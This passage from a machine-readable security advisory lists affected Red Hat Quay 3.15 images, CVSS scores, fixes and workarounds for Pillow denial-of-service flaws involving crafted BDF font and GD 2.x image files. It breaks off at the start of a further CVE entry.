"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "Do not load BDF font files from untrusted sources. Applications that only process standard image formats (PNG, JPEG, etc.) and do not use BdfFontFile or ImageFont.load() with BDF files are not affected.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted BDF font file"
},
{
"cve": "CVE-2026-55380",
"cwe": {
"id": "CWE-1285",
"name": "Improper Validation of Specified Index, Position, or Offset in Input"
},
"discovery_date": "2026-07-06T20:01:42.245051+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2497455"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Pillow, a Python imaging library. A remote attacker could exploit this vulnerability by providing a specially crafted GD 2.x image file. The GdImageFile._open() function reads image dimensions without proper validation, leading to excessive memory allocation. This can result in a Denial of Service (DoS) due to C-heap exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A denial-of-service vulnerability was found in Pillow\u0027s GdImageFile plugin. The GdImageFile._open() function reads image dimensions from GD 2.x file headers and stores them without performing a decompression bomb check. A crafted .gd file of approximately 1 KB can trigger an unchecked 4.3 GB C-heap allocation, potentially crashing the process or exhausting memory on systems with insufficient resources. This issue is fixed in Pillow 12.3.0.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-55380"
},
{
"category": "external",
"summary": "RHBZ#2497455",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497455"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-55380",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-55380"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55380"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675",
"url": "https://github.com/python-pillow/Pillow/commit/f39b0ae6624eb2d7c5c5d651d9bb5fdbd96a8675"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-phj9-mv4w-65pm"
}
],
"release_date": "2026-07-06T18:50:14.789000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-30T20:01:08+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:48933"
},
{
"category": "workaround",
"details": "Avoid processing untrusted GD 2.x image files with PIL.GdImageFile.open(). Use Image.open() instead, which includes decompression bomb protections for supported formats. If GdImageFile must be used, validate the image dimensions before calling load(). Restricting accepted image formats at the application boundary to only those explicitly needed can reduce exposure.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:33cc57d4b94be27402c910f3a88c96704af9a316128af9c10b35d8b951b897cd_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:035153582af7ad684123e474177f77ed9549dd410d222d16c4102022fea1de2f_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a909c0671f973962d482ed3a66886e37ec086c7e44502a54c6fefb065507c47f_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:f2f05ee1f01e92185583dfc63ca09adafadae8701ccd0a14098c2704b6273bce_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:2f5ec68c7c5e095b913089117a0df99420259950e50b3b1ee3263ca23f63be7b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:4e324568117f52512ec8b3e960aa5766ddea77f2dc3ac96c8f312c2ba94807ab_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:7c322657021d03c5f452543214c39a7c9e0061e5d4fad0b4fdf550fbfb23defd_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:981e303e898ab97986d85c3c6b208c100b7a7f605c3309702dc69f911a95a9b3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7a55c856f4103814c14f4d650ea89fc0ba2088d46ea7c315264622dc0d65e89a_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:071d056fda0fe4546be5963d9b193807c3b88b7681cc1c1cb77a5364c05d2c51_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:1ec8ddeef7aa52dcb522cec577cf55c72dfc6f9945aa52f3fa770ec01e6e20e2_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:9021e49a61ca01bdbc7b07ca0bcbf87d3675eeee987ed4ec8972d187849e5dd3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:c9e64e04bd56e8a0eb7378103375222982a070b2dba5a433de497ac7b756bf49_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:3ee122ba0a8d98edc7447ade746fc8d3b97a835f267ac3d18b4bc22e4fdbea80_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8a594f76497e36abdee27529905e5fa437eb4fa4e8e1267b7e0ed0328b8ed55e_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e07cd66b79aa5e342e621feab192e9791f2ccc28ab48bb63d08e73d29c631a50_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:3773976a2937e59ee577d2f5c73f19b8204cc5347e23d2ae4cdd70759189d4f5_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:840b0af68ff3b06d1f4195e3bde1a60019994c6255d9622131ec2950c8aad50e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:bdfd5823d00ece5e608428350741629d132351a6789cdd042d07dbb4fd1f11a6_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "python-pillow: Pillow: Denial of Service via crafted GD 2.x image file"
},
{
"cve": "CVE-2026-59197",
"cwe": {
"id": "CWE-787",
"name": "Out-of-bounds Write"
},
"discovery_date": "2026-07-14T17:01:29.487456+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:8e11b087f99de92f6f135ec4d3567c7a9001cb9f806bcc0de5c1ea00f81ad41b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:a2eb7829ecf57d4a1a3a331d056a5fa0f7d3469c5cc096c5d76d7e915f52b857_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:f62019f75e49598f7b973d684711efc494dccddf8fb82d27f2f80766206d6ef4_amd64",
